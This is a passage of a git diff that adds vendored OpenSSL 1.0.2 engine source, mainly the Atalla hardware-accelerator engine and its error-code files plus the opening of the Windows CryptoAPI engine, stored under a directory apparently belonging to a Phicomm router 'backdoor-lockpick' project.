+#  endif
+#  ifndef OPENSSL_NO_DSA
+    const DSA_METHOD *meth2;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth3;
+#  endif
+    if (!ENGINE_set_id(e, engine_atalla_id) ||
+        !ENGINE_set_name(e, engine_atalla_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &atalla_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &atalla_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &atalla_dh) ||
+#  endif
+        !ENGINE_set_destroy_function(e, atalla_destroy) ||
+        !ENGINE_set_init_function(e, atalla_init) ||
+        !ENGINE_set_finish_function(e, atalla_finish) ||
+        !ENGINE_set_ctrl_function(e, atalla_ctrl) ||
+        !ENGINE_set_cmd_defns(e, atalla_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * atalla-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    atalla_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    atalla_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    atalla_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    atalla_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    /*
+     * Use the DSA_OpenSSL() method and just hook the mod_exp-ish bits.
+     */
+    meth2 = DSA_OpenSSL();
+    atalla_dsa.dsa_do_sign = meth2->dsa_do_sign;
+    atalla_dsa.dsa_sign_setup = meth2->dsa_sign_setup;
+    atalla_dsa.dsa_do_verify = meth2->dsa_do_verify;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth3 = DH_OpenSSL();
+    atalla_dh.generate_key = meth3->generate_key;
+    atalla_dh.compute_key = meth3->compute_key;
+#  endif
+
+    /* Ensure the atalla error handling is set up */
+    ERR_load_ATALLA_strings();
+    return 1;
+}
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_atalla(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_atalla(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_atalla();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * Atalla library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+static DSO *atalla_dso = NULL;
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+static tfnASI_GetHardwareConfig *p_Atalla_GetHardwareConfig = NULL;
+static tfnASI_RSAPrivateKeyOpFn *p_Atalla_RSAPrivateKeyOpFn = NULL;
+static tfnASI_GetPerformanceStatistics *p_Atalla_GetPerformanceStatistics =
+    NULL;
+
+/*
+ * These are the static string constants for the DSO file name and the
+ * function symbol names to bind to. Regrettably, the DSO name on *nix
+ * appears to be "atasi.so" rather than something more consistent like
+ * "libatasi.so". At the time of writing, I'm not sure what the file name on
+ * win32 is but clearly native name translation is not possible (eg
+ * libatasi.so on *nix, and atasi.dll on win32). For the purposes of testing,
+ * I have created a symbollic link called "libatasi.so" so that we can use
+ * native name-translation - a better solution will be needed.
+ */
+static const char *ATALLA_LIBNAME = NULL;
+static const char *get_ATALLA_LIBNAME(void)
+{
+    if (ATALLA_LIBNAME)
+        return ATALLA_LIBNAME;
+    return "atasi";
+}
+
+static void free_ATALLA_LIBNAME(void)
+{
+    if (ATALLA_LIBNAME)
+        OPENSSL_free((void *)ATALLA_LIBNAME);
+    ATALLA_LIBNAME = NULL;
+}
+
+static long set_ATALLA_LIBNAME(const char *name)
+{
+    free_ATALLA_LIBNAME();
+    return (((ATALLA_LIBNAME = BUF_strdup(name)) != NULL) ? 1 : 0);
+}
+
+static const char *ATALLA_F1 = "ASI_GetHardwareConfig";
+static const char *ATALLA_F2 = "ASI_RSAPrivateKeyOpFn";
+static const char *ATALLA_F3 = "ASI_GetPerformanceStatistics";
+
+/* Destructor (complements the "ENGINE_atalla()" constructor) */
+static int atalla_destroy(ENGINE *e)
+{
+    free_ATALLA_LIBNAME();
+    /*
+     * Unload the atalla error strings so any error state including our
+     * functs or reasons won't lead to a segfault (they simply get displayed
+     * without corresponding string data because none will be found).
+     */
+    ERR_unload_ATALLA_strings();
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int atalla_init(ENGINE *e)
+{
+    tfnASI_GetHardwareConfig *p1;
+    tfnASI_RSAPrivateKeyOpFn *p2;
+    tfnASI_GetPerformanceStatistics *p3;
+    /*
+     * Not sure of the origin of this magic value, but Ben's code had it and
+     * it seemed to have been working for a few people. :-)
+     */
+    unsigned int config_buf[1024];
+
+    if (atalla_dso != NULL) {
+        ATALLAerr(ATALLA_F_ATALLA_INIT, ATALLA_R_ALREADY_LOADED);
+        goto err;
+    }
+    /*
+     * Attempt to load libatasi.so/atasi.dll/whatever. Needs to be changed
+     * unfortunately because the Atalla drivers don't have standard library
+     * names that can be platform-translated well.
+     */
+    /*
+     * TODO: Work out how to actually map to the names the Atalla drivers
+     * really use - for now a symbollic link needs to be created on the host
+     * system from libatasi.so to atasi.so on unix variants.
+     */
+    atalla_dso = DSO_load(NULL, get_ATALLA_LIBNAME(), NULL, 0);
+    if (atalla_dso == NULL) {
+        ATALLAerr(ATALLA_F_ATALLA_INIT, ATALLA_R_NOT_LOADED);
+        goto err;
+    }
+    if (!
+        (p1 =
+         (tfnASI_GetHardwareConfig *) DSO_bind_func(atalla_dso, ATALLA_F1))
+|| !(p2 = (tfnASI_RSAPrivateKeyOpFn *) DSO_bind_func(atalla_dso, ATALLA_F2))
+|| !(p3 =
+     (tfnASI_GetPerformanceStatistics *) DSO_bind_func(atalla_dso,
+                                                       ATALLA_F3))) {
+        ATALLAerr(ATALLA_F_ATALLA_INIT, ATALLA_R_NOT_LOADED);
+        goto err;
+    }
+    /* Copy the pointers */
+    p_Atalla_GetHardwareConfig = p1;
+    p_Atalla_RSAPrivateKeyOpFn = p2;
+    p_Atalla_GetPerformanceStatistics = p3;
+    /*
+     * Perform a basic test to see if there's actually any unit running.
+     */
+    if (p1(0L, config_buf) != 0) {
+        ATALLAerr(ATALLA_F_ATALLA_INIT, ATALLA_R_UNIT_FAILURE);
+        goto err;
+    }
+    /* Everything's fine. */
+    return 1;
+ err:
+    if (atalla_dso)
+        DSO_free(atalla_dso);
+    atalla_dso = NULL;
+    p_Atalla_GetHardwareConfig = NULL;
+    p_Atalla_RSAPrivateKeyOpFn = NULL;
+    p_Atalla_GetPerformanceStatistics = NULL;
+    return 0;
+}
+
+static int atalla_finish(ENGINE *e)
+{
+    free_ATALLA_LIBNAME();
+    if (atalla_dso == NULL) {
+        ATALLAerr(ATALLA_F_ATALLA_FINISH, ATALLA_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(atalla_dso)) {
+        ATALLAerr(ATALLA_F_ATALLA_FINISH, ATALLA_R_UNIT_FAILURE);
+        return 0;
+    }
+    atalla_dso = NULL;
+    p_Atalla_GetHardwareConfig = NULL;
+    p_Atalla_RSAPrivateKeyOpFn = NULL;
+    p_Atalla_GetPerformanceStatistics = NULL;
+    return 1;
+}
+
+static int atalla_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int initialised = ((atalla_dso == NULL) ? 0 : 1);
+    switch (cmd) {
+    case ATALLA_CMD_SO_PATH:
+        if (p == NULL) {
+            ATALLAerr(ATALLA_F_ATALLA_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            ATALLAerr(ATALLA_F_ATALLA_CTRL, ATALLA_R_ALREADY_LOADED);
+            return 0;
+        }
+        return set_ATALLA_LIBNAME((const char *)p);
+    default:
+        break;
+    }
+    ATALLAerr(ATALLA_F_ATALLA_CTRL, ATALLA_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int atalla_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                          const BIGNUM *m, BN_CTX *ctx)
+{
+    /*
+     * I need somewhere to store temporary serialised values for use with the
+     * Atalla API calls. A neat cheat - I'll use BIGNUMs from the BN_CTX but
+     * access their arrays directly as byte arrays <grin>. This way I don't
+     * have to clean anything up.
+     */
+    BIGNUM *modulus;
+    BIGNUM *exponent;
+    BIGNUM *argument;
+    BIGNUM *result;
+    RSAPrivateKey keydata;
+    int to_return, numbytes;
+
+    modulus = exponent = argument = result = NULL;
+    to_return = 0;              /* expect failure */
+
+    if (!atalla_dso) {
+        ATALLAerr(ATALLA_F_ATALLA_MOD_EXP, ATALLA_R_NOT_LOADED);
+        goto err;
+    }
+    /* Prepare the params */
+    BN_CTX_start(ctx);
+    modulus = BN_CTX_get(ctx);
+    exponent = BN_CTX_get(ctx);
+    argument = BN_CTX_get(ctx);
+    result = BN_CTX_get(ctx);
+    if (!result) {
+        ATALLAerr(ATALLA_F_ATALLA_MOD_EXP, ATALLA_R_BN_CTX_FULL);
+        goto err;
+    }
+    if (!bn_wexpand(modulus, m->top) || !bn_wexpand(exponent, m->top) ||
+        !bn_wexpand(argument, m->top) || !bn_wexpand(result, m->top)) {
+        ATALLAerr(ATALLA_F_ATALLA_MOD_EXP, ATALLA_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    /* Prepare the key-data */
+    memset(&keydata, 0, sizeof keydata);
+    numbytes = BN_num_bytes(m);
+    memset(exponent->d, 0, numbytes);
+    memset(modulus->d, 0, numbytes);
+    BN_bn2bin(p, (unsigned char *)exponent->d + numbytes - BN_num_bytes(p));
+    BN_bn2bin(m, (unsigned char *)modulus->d + numbytes - BN_num_bytes(m));
+    keydata.privateExponent.data = (unsigned char *)exponent->d;
+    keydata.privateExponent.len = numbytes;
+    keydata.modulus.data = (unsigned char *)modulus->d;
+    keydata.modulus.len = numbytes;
+    /* Prepare the argument */
+    memset(argument->d, 0, numbytes);
+    memset(result->d, 0, numbytes);
+    BN_bn2bin(a, (unsigned char *)argument->d + numbytes - BN_num_bytes(a));
+    /* Perform the operation */
+    if (p_Atalla_RSAPrivateKeyOpFn(&keydata, (unsigned char *)result->d,
+                                   (unsigned char *)argument->d,
+                                   keydata.modulus.len) != 0) {
+        ATALLAerr(ATALLA_F_ATALLA_MOD_EXP, ATALLA_R_REQUEST_FAILED);
+        goto err;
+    }
+    /* Convert the response */
+    BN_bin2bn((unsigned char *)result->d, numbytes, r);
+    to_return = 1;
+ err:
+    BN_CTX_end(ctx);
+    return to_return;
+}
+
+#  ifndef OPENSSL_NO_RSA
+static int atalla_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx)
+{
+    int to_return = 0;
+
+    if (!atalla_dso) {
+        ATALLAerr(ATALLA_F_ATALLA_RSA_MOD_EXP, ATALLA_R_NOT_LOADED);
+        goto err;
+    }
+    if (!rsa->d || !rsa->n) {
+        ATALLAerr(ATALLA_F_ATALLA_RSA_MOD_EXP,
+                  ATALLA_R_MISSING_KEY_COMPONENTS);
+        goto err;
+    }
+    to_return = atalla_mod_exp(r0, I, rsa->d, rsa->n, ctx);
+ err:
+    return to_return;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/*
+ * This code was liberated and adapted from the commented-out code in
+ * dsa_ossl.c. Because of the unoptimised form of the Atalla acceleration (it
+ * doesn't have a CRT form for RSA), this function means that an Atalla
+ * system running with a DSA server certificate can handshake around 5 or 6
+ * times faster/more than an equivalent system running with RSA. Just check
+ * out the "signs" statistics from the RSA and DSA parts of "openssl speed
+ * -engine atalla dsa1024 rsa1024".
+ */
+static int atalla_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                              BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                              BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int to_return = 0;
+
+    BN_init(&t);
+    /* let rr = a1 ^ p1 mod m */
+    if (!atalla_mod_exp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!atalla_mod_exp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    to_return = 1;
+ end:
+    BN_free(&t);
+    return to_return;
+}
+
+static int atalla_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                              const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx)
+{
+    return atalla_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int atalla_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                               const BIGNUM *m, BN_CTX *ctx,
+                               BN_MONT_CTX *m_ctx)
+{
+    return atalla_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int atalla_mod_exp_dh(const DH *dh, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return atalla_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_atalla_id) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* OPENSSL_NO_DYNAMIC_ENGINE */
+# endif                         /* !OPENSSL_NO_HW_ATALLA */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla.ec
new file mode 100644
index 0000000..1d735e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla.ec
@@ -0,0 +1 @@
+L ATALLA	e_atalla_err.h			e_atalla_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla_err.c
new file mode 100644
index 0000000..ff47322
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla_err.c
@@ -0,0 +1,145 @@
+/* e_atalla_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_atalla_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA ATALLA_str_functs[] = {
+    {ERR_FUNC(ATALLA_F_ATALLA_CTRL), "ATALLA_CTRL"},
+    {ERR_FUNC(ATALLA_F_ATALLA_FINISH), "ATALLA_FINISH"},
+    {ERR_FUNC(ATALLA_F_ATALLA_INIT), "ATALLA_INIT"},
+    {ERR_FUNC(ATALLA_F_ATALLA_MOD_EXP), "ATALLA_MOD_EXP"},
+    {ERR_FUNC(ATALLA_F_ATALLA_RSA_MOD_EXP), "ATALLA_RSA_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA ATALLA_str_reasons[] = {
+    {ERR_REASON(ATALLA_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(ATALLA_R_BN_CTX_FULL), "bn ctx full"},
+    {ERR_REASON(ATALLA_R_BN_EXPAND_FAIL), "bn expand fail"},
+    {ERR_REASON(ATALLA_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(ATALLA_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {ERR_REASON(ATALLA_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(ATALLA_R_REQUEST_FAILED), "request failed"},
+    {ERR_REASON(ATALLA_R_UNIT_FAILURE), "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef ATALLA_LIB_NAME
+static ERR_STRING_DATA ATALLA_lib_name[] = {
+    {0, ATALLA_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int ATALLA_lib_error_code = 0;
+static int ATALLA_error_init = 1;
+
+static void ERR_load_ATALLA_strings(void)
+{
+    if (ATALLA_lib_error_code == 0)
+        ATALLA_lib_error_code = ERR_get_next_error_library();
+
+    if (ATALLA_error_init) {
+        ATALLA_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(ATALLA_lib_error_code, ATALLA_str_functs);
+        ERR_load_strings(ATALLA_lib_error_code, ATALLA_str_reasons);
+#endif
+
+#ifdef ATALLA_LIB_NAME
+        ATALLA_lib_name->error = ERR_PACK(ATALLA_lib_error_code, 0, 0);
+        ERR_load_strings(0, ATALLA_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_ATALLA_strings(void)
+{
+    if (ATALLA_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(ATALLA_lib_error_code, ATALLA_str_functs);
+        ERR_unload_strings(ATALLA_lib_error_code, ATALLA_str_reasons);
+#endif
+
+#ifdef ATALLA_LIB_NAME
+        ERR_unload_strings(0, ATALLA_lib_name);
+#endif
+        ATALLA_error_init = 1;
+    }
+}
+
+static void ERR_ATALLA_error(int function, int reason, char *file, int line)
+{
+    if (ATALLA_lib_error_code == 0)
+        ATALLA_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(ATALLA_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla_err.h
new file mode 100644
index 0000000..7b71eff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla_err.h
@@ -0,0 +1,94 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_ATALLA_ERR_H
+# define HEADER_ATALLA_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_ATALLA_strings(void);
+static void ERR_unload_ATALLA_strings(void);
+static void ERR_ATALLA_error(int function, int reason, char *file, int line);
+# define ATALLAerr(f,r) ERR_ATALLA_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the ATALLA functions. */
+
+/* Function codes. */
+# define ATALLA_F_ATALLA_CTRL                             100
+# define ATALLA_F_ATALLA_FINISH                           101
+# define ATALLA_F_ATALLA_INIT                             102
+# define ATALLA_F_ATALLA_MOD_EXP                          103
+# define ATALLA_F_ATALLA_RSA_MOD_EXP                      104
+
+/* Reason codes. */
+# define ATALLA_R_ALREADY_LOADED                          100
+# define ATALLA_R_BN_CTX_FULL                             101
+# define ATALLA_R_BN_EXPAND_FAIL                          102
+# define ATALLA_R_CTRL_COMMAND_NOT_IMPLEMENTED            103
+# define ATALLA_R_MISSING_KEY_COMPONENTS                  104
+# define ATALLA_R_NOT_LOADED                              105
+# define ATALLA_R_REQUEST_FAILED                          106
+# define ATALLA_R_UNIT_FAILURE                            107
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi.c
new file mode 100644
index 0000000..f4cd2ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi.c
@@ -0,0 +1,1848 @@
+/* engines/e_capi.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include <openssl/crypto.h>
+
+#ifdef OPENSSL_SYS_WIN32
+# ifndef OPENSSL_NO_CAPIENG
+
+#  include <openssl/buffer.h>
+#  include <openssl/bn.h>
+#  include <openssl/rsa.h>
+
+#  ifndef _WIN32_WINNT
+#   define _WIN32_WINNT 0x0400
+#  endif
+
+#  include <windows.h>
+#  include <wincrypt.h>
+#  include <malloc.h>
+#  ifndef alloca
+#   define alloca _alloca
+#  endif
+
+/*
+ * This module uses several "new" interfaces, among which is
+ * CertGetCertificateContextProperty. CERT_KEY_PROV_INFO_PROP_ID is
+ * one of possible values you can pass to function in question. By
+ * checking if it's defined we can see if wincrypt.h and accompanying
+ * crypt32.lib are in shape. The native MingW32 headers up to and
+ * including __W32API_VERSION 3.14 lack of struct DSSPUBKEY and the
+ * defines CERT_STORE_PROV_SYSTEM_A and CERT_STORE_READONLY_FLAG,
+ * so we check for these too and avoid compiling.
+ * Yes, it's rather "weak" test and if compilation fails,
+ * then re-configure with -DOPENSSL_NO_CAPIENG.
+ */
+#  if defined(CERT_KEY_PROV_INFO_PROP_ID) && \
+    defined(CERT_STORE_PROV_SYSTEM_A) && \
+    defined(CERT_STORE_READONLY_FLAG)
